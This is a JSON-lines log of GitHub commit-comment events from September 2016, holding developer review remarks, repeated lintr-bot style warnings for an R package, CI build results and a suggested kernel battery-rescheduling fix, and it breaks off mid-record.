{"id":"4596318969","type":"CommitCommentEvent","actor":{"login":"alexanderzobnin"},"repo":{"name":"Staples-Inc/mqe-datasource"},"payload":{"comment":{"id":19113828,"position":null,"line":null,"path":null,"commit_id":"0b3050b1808fe0e1c899c5c59a79a36b3b1e946f","created_at":"2016-09-21T13:43:03Z","updated_at":"2016-09-21T13:43:03Z","body":"This is in my case. Entire name had been replaced by alias.\r\n\r\n<img width=\"1280\" alt=\"screen shot 2016-09-21 at 16 39 18\" src=\"https://cloud.githubusercontent.com/assets/4932851/18713173/04bfc1a2-801a-11e6-907a-ac985b11ddd8.png\">\r\n"}},"created_at":"2016-09-21T13:43:03Z"}
{"id":"4596319962","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19113831,"position":null,"line":null,"path":null,"commit_id":"0e4d31ab9a1e1b26411f7c20220de927f0870511","created_at":"2016-09-21T13:43:13Z","updated_at":"2016-09-21T13:43:13Z","body":"[R/irlba.R:300:1:](https://github.com/bwlewis/irlba/blob/0e4d31ab9a1e1b26411f7c20220de927f0870511/R/irlba.R#L300) *style:* **lines should not be more than 130 characters.**\n```r\n​      if (verbose) message(\"Initializing starting vector v with samples from standard normal distribution.\\nUse `set.seed` first for reproducibility.\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/irlba.R:342:9:](https://github.com/bwlewis/irlba/blob/0e4d31ab9a1e1b26411f7c20220de927f0870511/R/irlba.R#L342) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:635:5:](https://github.com/bwlewis/irlba/blob/0e4d31ab9a1e1b26411f7c20220de927f0870511/R/irlba.R#L635) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[tests/edge.R:30:19:](https://github.com/bwlewis/irlba/blob/0e4d31ab9a1e1b26411f7c20220de927f0870511/tests/edge.R#L30) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```\n[tests/edge.R:60:22:](https://github.com/bwlewis/irlba/blob/0e4d31ab9a1e1b26411f7c20220de927f0870511/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                     ^\n```\n[tests/edge.R:60:24:](https://github.com/bwlewis/irlba/blob/0e4d31ab9a1e1b26411f7c20220de927f0870511/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                       ^\n```\n[tests/edge.R:60:26:](https://github.com/bwlewis/irlba/blob/0e4d31ab9a1e1b26411f7c20220de927f0870511/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                         ^\n```\n[tests/edge.R:60:28:](https://github.com/bwlewis/irlba/blob/0e4d31ab9a1e1b26411f7c20220de927f0870511/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                           ^\n```\n[tests/edge.R:60:30:](https://github.com/bwlewis/irlba/blob/0e4d31ab9a1e1b26411f7c20220de927f0870511/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                             ^\n```\n[tests/edge.R:60:32:](https://github.com/bwlewis/irlba/blob/0e4d31ab9a1e1b26411f7c20220de927f0870511/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                               ^\n```\n[tests/edge.R:60:34:](https://github.com/bwlewis/irlba/blob/0e4d31ab9a1e1b26411f7c20220de927f0870511/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                 ^\n```\n[tests/edge.R:60:36:](https://github.com/bwlewis/irlba/blob/0e4d31ab9a1e1b26411f7c20220de927f0870511/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                   ^\n```\n[tests/edge.R:62:22:](https://github.com/bwlewis/irlba/blob/0e4d31ab9a1e1b26411f7c20220de927f0870511/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                     ^\n```\n[tests/edge.R:62:24:](https://github.com/bwlewis/irlba/blob/0e4d31ab9a1e1b26411f7c20220de927f0870511/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                       ^\n```\n[tests/edge.R:62:26:](https://github.com/bwlewis/irlba/blob/0e4d31ab9a1e1b26411f7c20220de927f0870511/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                         ^\n```\n[tests/edge.R:62:28:](https://github.com/bwlewis/irlba/blob/0e4d31ab9a1e1b26411f7c20220de927f0870511/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                           ^\n```\n[tests/edge.R:62:30:](https://github.com/bwlewis/irlba/blob/0e4d31ab9a1e1b26411f7c20220de927f0870511/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                             ^\n```\n[tests/edge.R:62:32:](https://github.com/bwlewis/irlba/blob/0e4d31ab9a1e1b26411f7c20220de927f0870511/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                               ^\n```\n[tests/edge.R:62:34:](https://github.com/bwlewis/irlba/blob/0e4d31ab9a1e1b26411f7c20220de927f0870511/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                 ^\n```\n[tests/edge.R:62:36:](https://github.com/bwlewis/irlba/blob/0e4d31ab9a1e1b26411f7c20220de927f0870511/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                   ^\n```"}},"created_at":"2016-09-21T13:43:13Z"}
{"id":"4596320984","type":"CommitCommentEvent","actor":{"login":"Shoaib0597"},"repo":{"name":"neobuddy89/android_kernel_cyanogen_msm8916"},"payload":{"comment":{"id":19113837,"position":null,"line":null,"path":null,"commit_id":"2dd962dea3797fdbf25caa1001a6dc97ab2b638d","created_at":"2016-09-21T13:43:24Z","updated_at":"2016-09-21T13:43:24Z","body":"Hi,\r\n\r\nThe current rescheduling mechanism has one problem. As soon as the Battery-Level reaches the Eco Level, the driver sets the Core Limit as specified in Eco Mode. This is fine. However, if one starts charging the phone, the Battery-Level increases again passing the Eco Level. So, the driver should automatically set the No. of Cores to Default Max. CPUs but this doesn't happen. The number of cores still remain equal to Eco_Mode even though the Battery-Level is above the Eco_Level (as re-scheduling only occurs at the defined percentage, not above it).\r\n\r\nHowever, this fixes the issue---\r\n/* Correct Rescheduling Mechanism. */\r\n \tif (info.batt_level == helper.batt_level_cri || info.batt_level == helper.batt_level_eco \r\n         || info.batt_level == helper.batt_level_cri + 1 || info.batt_level == helper.batt_level_eco + 1)\r\n                   reschedule_helper();\r\n\r\n:) :)"}},"created_at":"2016-09-21T13:43:24Z"}
{"id":"4596321423","type":"CommitCommentEvent","actor":{"login":"huacnlee"},"repo":{"name":"ruby-china/ruby-china"},"payload":{"comment":{"id":19113839,"position":null,"line":null,"path":null,"commit_id":"e53bd839653a7181ab53539603ad45869f195bb8","created_at":"2016-09-21T13:43:27Z","updated_at":"2016-09-21T13:43:27Z","body":"可以的呀，我试了普通账号，你看的是那个页面？"}},"created_at":"2016-09-21T13:43:27Z"}
{"id":"4596321416","type":"CommitCommentEvent","actor":{"login":"raj454raj"},"repo":{"name":"stopstalk/stopstalk-deployment"},"payload":{"comment":{"id":19113840,"position":null,"line":null,"path":null,"commit_id":"4ae5ee6120e61cd338c9f449b93506b82f140aef","created_at":"2016-09-21T13:43:28Z","updated_at":"2016-09-21T13:43:28Z","body":"Step 5 also done."}},"created_at":"2016-09-21T13:43:28Z"}
{"id":"4596323217","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19113845,"position":7,"line":39,"path":"src/SkirtBrim.cpp","commit_id":"0b4eda9592d2025b8461524eb4562013160eb82b","created_at":"2016-09-21T13:43:45Z","updated_at":"2016-09-21T13:43:45Z","body":"As someone diving fresh into CuraEngine code, do we need to worry about these \"magic numbers\"?"}},"created_at":"2016-09-21T13:43:45Z"}
{"id":"4596325058","type":"CommitCommentEvent","actor":{"login":"cat6654"},"repo":{"name":"cat6654/QaAutomaionTeam3"},"payload":{"comment":{"id":19113849,"position":null,"line":null,"path":null,"commit_id":"5770a8fd2213a2e2b31190d0e294c6d9cb492ed1","created_at":"2016-09-21T13:44:04Z","updated_at":"2016-09-21T13:44:04Z","body":"Overall tests are ok but:\r\n1. Variable names should not be c1,c2 etc. - all names should be self explanatory. Always.\r\n2. If you do an Assert -> you should always specify Exception message that will be displayed if assert is failed. otherwize it's hard to analyze your test results, especially if you are not the one who does it.\r\n"}},"created_at":"2016-09-21T13:44:04Z"}
{"id":"4596328417","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19113860,"position":null,"line":null,"path":null,"commit_id":"ceb2326629556eeee6430cd3aff91e371b9bb15b","created_at":"2016-09-21T13:44:38Z","updated_at":"2016-09-21T13:44:38Z","body":"[R/irlba.R:300:1:](https://github.com/bwlewis/irlba/blob/ceb2326629556eeee6430cd3aff91e371b9bb15b/R/irlba.R#L300) *style:* **lines should not be more than 130 characters.**\n```r\n​      if (verbose) message(\"Initializing starting vector v with samples from standard normal distribution.\\nUse `set.seed` first for reproducibility.\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/irlba.R:342:9:](https://github.com/bwlewis/irlba/blob/ceb2326629556eeee6430cd3aff91e371b9bb15b/R/irlba.R#L342) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:635:5:](https://github.com/bwlewis/irlba/blob/ceb2326629556eeee6430cd3aff91e371b9bb15b/R/irlba.R#L635) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[tests/edge.R:30:19:](https://github.com/bwlewis/irlba/blob/ceb2326629556eeee6430cd3aff91e371b9bb15b/tests/edge.R#L30) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```\n[tests/edge.R:60:22:](https://github.com/bwlewis/irlba/blob/ceb2326629556eeee6430cd3aff91e371b9bb15b/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                     ^\n```\n[tests/edge.R:60:24:](https://github.com/bwlewis/irlba/blob/ceb2326629556eeee6430cd3aff91e371b9bb15b/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                       ^\n```\n[tests/edge.R:60:26:](https://github.com/bwlewis/irlba/blob/ceb2326629556eeee6430cd3aff91e371b9bb15b/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                         ^\n```\n[tests/edge.R:60:28:](https://github.com/bwlewis/irlba/blob/ceb2326629556eeee6430cd3aff91e371b9bb15b/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                           ^\n```\n[tests/edge.R:60:30:](https://github.com/bwlewis/irlba/blob/ceb2326629556eeee6430cd3aff91e371b9bb15b/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                             ^\n```\n[tests/edge.R:60:32:](https://github.com/bwlewis/irlba/blob/ceb2326629556eeee6430cd3aff91e371b9bb15b/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                               ^\n```\n[tests/edge.R:60:34:](https://github.com/bwlewis/irlba/blob/ceb2326629556eeee6430cd3aff91e371b9bb15b/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                 ^\n```\n[tests/edge.R:60:36:](https://github.com/bwlewis/irlba/blob/ceb2326629556eeee6430cd3aff91e371b9bb15b/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                   ^\n```\n[tests/edge.R:62:22:](https://github.com/bwlewis/irlba/blob/ceb2326629556eeee6430cd3aff91e371b9bb15b/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                     ^\n```\n[tests/edge.R:62:24:](https://github.com/bwlewis/irlba/blob/ceb2326629556eeee6430cd3aff91e371b9bb15b/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                       ^\n```\n[tests/edge.R:62:26:](https://github.com/bwlewis/irlba/blob/ceb2326629556eeee6430cd3aff91e371b9bb15b/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                         ^\n```\n[tests/edge.R:62:28:](https://github.com/bwlewis/irlba/blob/ceb2326629556eeee6430cd3aff91e371b9bb15b/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                           ^\n```\n[tests/edge.R:62:30:](https://github.com/bwlewis/irlba/blob/ceb2326629556eeee6430cd3aff91e371b9bb15b/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                             ^\n```\n[tests/edge.R:62:32:](https://github.com/bwlewis/irlba/blob/ceb2326629556eeee6430cd3aff91e371b9bb15b/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                               ^\n```\n[tests/edge.R:62:34:](https://github.com/bwlewis/irlba/blob/ceb2326629556eeee6430cd3aff91e371b9bb15b/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                 ^\n```\n[tests/edge.R:62:36:](https://github.com/bwlewis/irlba/blob/ceb2326629556eeee6430cd3aff91e371b9bb15b/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                   ^\n```"}},"created_at":"2016-09-21T13:44:38Z"}
{"id":"4596328613","type":"CommitCommentEvent","actor":{"login":"akien-mga"},"repo":{"name":"KOBUGE-Incubator/Oblast-K"},"payload":{"comment":{"id":19113862,"position":null,"line":null,"path":null,"commit_id":"37378afa812b2fe7581ae7affe601fe712e4e245","created_at":"2016-09-21T13:44:40Z","updated_at":"2016-09-21T13:44:40Z","body":"Why not keep the git commit history if you're migrating from gitlab.com?"}},"created_at":"2016-09-21T13:44:40Z"}
{"id":"4596332520","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19113875,"position":null,"line":null,"path":null,"commit_id":"18e49a120381987072600286bb96a2e0e1bcd584","created_at":"2016-09-21T13:45:19Z","updated_at":"2016-09-21T13:45:19Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/519/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2076)."}},"created_at":"2016-09-21T13:45:19Z"}
{"id":"4596333626","type":"CommitCommentEvent","actor":{"login":"xwangg"},"repo":{"name":"cs150bf/ever-notedown"},"payload":{"comment":{"id":19113879,"position":null,"line":null,"path":null,"commit_id":"f05cadc39f3e24c72d6c0320e56311074a1ebfd0","created_at":"2016-09-21T13:45:31Z","updated_at":"2016-09-21T13:45:31Z","body":"I run into this error too"}},"created_at":"2016-09-21T13:45:31Z"}
{"id":"4596335866","type":"CommitCommentEvent","actor":{"login":"bpoldrack"},"repo":{"name":"bpoldrack/datalad"},"payload":{"comment":{"id":19113889,"position":8,"line":596,"path":"datalad/distribution/install.py","commit_id":"5f5de3673af696670ca6f806626ea31913ab2d02","created_at":"2016-09-21T13:45:52Z","updated_at":"2016-09-21T13:45:52Z","body":"Re decrementing `recursion_limit`: `installed_items` are not necessarily at the same level. So - no, that's not hte solution. But I should reconsider this line indeed. Give me second.\r\n"}},"created_at":"2016-09-21T13:45:52Z"}
{"id":"4596338195","type":"CommitCommentEvent","actor":{"login":"Tangyuan1994"},"repo":{"name":"Tangyuan1994/hello_world"},"payload":{"comment":{"id":19113895,"position":null,"line":null,"path":null,"commit_id":"6d5683579e7d1243549d8fbea971c8611ecacead","created_at":"2016-09-21T13:46:16Z","updated_at":"2016-09-21T13:46:16Z","body":"azazeaze"}},"created_at":"2016-09-21T13:46:16Z"}
{"id":"4596338418","type":"CommitCommentEvent","actor":{"login":"Tangyuan1994"},"repo":{"name":"Tangyuan1994/hello_world"},"payload":{"comment":{"id":19113896,"position":null,"line":null,"path":null,"commit_id":"6d5683579e7d1243549d8fbea971c8611ecacead","created_at":"2016-09-21T13:46:18Z","updated_at":"2016-09-21T13:46:18Z","body":"azeaez"}},"created_at":"2016-09-21T13:46:18Z"}
{"id":"4596340031","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19113902,"position":null,"line":null,"path":null,"commit_id":"2f7088dc1447787478cbd4aafd4d75c55f440ec9","created_at":"2016-09-21T13:46:33Z","updated_at":"2016-09-21T13:46:33Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Z03eFeo_QgafdjRayJJtjw"}},"created_at":"2016-09-21T13:46:33Z"}
{"id":"4596340818","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19113904,"position":null,"line":null,"path":null,"commit_id":"75458347bbcacc5121d692873f467064c7c9a3d9","created_at":"2016-09-21T13:46:40Z","updated_at":"2016-09-21T13:46:40Z","body":"I fancy this attempt...\r\nOf course, when `whiteMaterial == blackMaterial` and `whiteMaterial == BishopValueMg`, then `blackMaterial == BishopValueMg` is always `true` :-)"}},"created_at":"2016-09-21T13:46:40Z"}
{"id":"4596346498","type":"CommitCommentEvent","actor":{"login":"clementLanglet"},"repo":{"name":"clementLanglet/DepInfoNancy"},"payload":{"comment":{"id":19113919,"position":1,"line":1,"path":"Coucou","commit_id":"71bc808ce4333a4a738192a92d4c748ec6593587","created_at":"2016-09-21T13:47:38Z","updated_at":"2016-09-21T13:47:38Z","body":"Salut\r\n"}},"created_at":"2016-09-21T13:47:38Z"}
{"id":"4596346512","type":"CommitCommentEvent","actor":{"login":"alacambra"},"repo":{"name":"hwuerz/jpa-example"},"payload":{"comment":{"id":19113920,"position":12,"line":12,"path":"pom.xml","commit_id":"adbbef29151fa4399feebf491949cc70bbe245e8","created_at":"2016-09-21T13:47:38Z","updated_at":"2016-09-21T13:47:38Z","body":"wenn du Wildfly verwendest brauchst du es nicht"}},"created_at":"2016-09-21T13:47:38Z"}
{"id":"4596347485","type":"CommitCommentEvent","actor":{"login":"minecrafter"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":19113923,"position":5,"line":126,"path":"api/src/main/java/com/voxelwind/api/server/event/block/BlockReplaceEvent.java","commit_id":"fe8d1cebd2aa3a61216b81524f39d76aea5ac99d","created_at":"2016-09-21T13:47:48Z","updated_at":"2016-09-21T13:47:48Z","body":"It can't be. Certain events might differ in what results are offered."}},"created_at":"2016-09-21T13:47:48Z"}
{"id":"4596350851","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19113935,"position":null,"line":null,"path":null,"commit_id":"f57af3253d667002ba50f1dddf5f79b6c775177e","created_at":"2016-09-21T13:48:21Z","updated_at":"2016-09-21T13:48:21Z","body":"TeamCity libpalaso :: palaso-trusty64-lfmerge Continuous [Build 2.6.73.f57af3253d667002ba50f1dddf5f79b6c775177e](http://build.palaso.org/viewLog.html?buildId=77000&buildTypeId=PalasoPrecise64lfmergeContinuous) outcome was **FAILURE**\nSummary: Tests failed: 4 (4 new), passed: 3466, ignored: 107 Build time: 00:05:33\n### Failed tests\n```\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.ReleaseLock_LockedByActiveProcess_LockFileExists: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcess_ReturnsFalse: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcessNotTimedOut_ReturnsFalse: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcessTimedOut_ReturnsTrue: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-21T13:48:21Z"}
{"id":"4596351395","type":"CommitCommentEvent","actor":{"login":"Muraszko"},"repo":{"name":"WGBH/AAPB2"},"payload":{"comment":{"id":19113936,"position":null,"line":null,"path":null,"commit_id":"a6d38265d962ec810b44c2977e85501ad499df98","created_at":"2016-09-21T13:48:27Z","updated_at":"2016-09-21T13:48:27Z","body":"Sorry about that @afred I removed this directory trying to see if it would fix the Travis failures and didn't notice you had done work to it so I put your changes back with this commit."}},"created_at":"2016-09-21T13:48:27Z"}
{"id":"4596351639","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19113938,"position":null,"line":null,"path":null,"commit_id":"ade71145c6078bac0ee00de05b584afca0c7a385","created_at":"2016-09-21T13:48:29Z","updated_at":"2016-09-21T13:48:29Z","body":"[R/irlba.R:300:1:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/R/irlba.R#L300) *style:* **lines should not be more than 130 characters.**\n```r\n​      if (verbose) message(\"Initializing starting vector v with samples from standard normal distribution.\\nUse `set.seed` first for reproducibility.\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/irlba.R:342:9:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/R/irlba.R#L342) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:635:5:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/R/irlba.R#L635) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[tests/edge.R:30:19:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L30) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```\n[tests/edge.R:60:22:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                     ^\n```\n[tests/edge.R:60:24:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                       ^\n```\n[tests/edge.R:60:26:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                         ^\n```\n[tests/edge.R:60:28:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                           ^\n```\n[tests/edge.R:60:30:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                             ^\n```\n[tests/edge.R:60:32:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                               ^\n```\n[tests/edge.R:60:34:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                 ^\n```\n[tests/edge.R:60:36:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                   ^\n```\n[tests/edge.R:62:22:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                     ^\n```\n[tests/edge.R:62:24:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                       ^\n```\n[tests/edge.R:62:26:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                         ^\n```\n[tests/edge.R:62:28:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                           ^\n```\n[tests/edge.R:62:30:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                             ^\n```\n[tests/edge.R:62:32:](https://github.com/bwlewis/irlba/blob/ade71145c6078bac0ee00de05b584afca0c7a385/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                               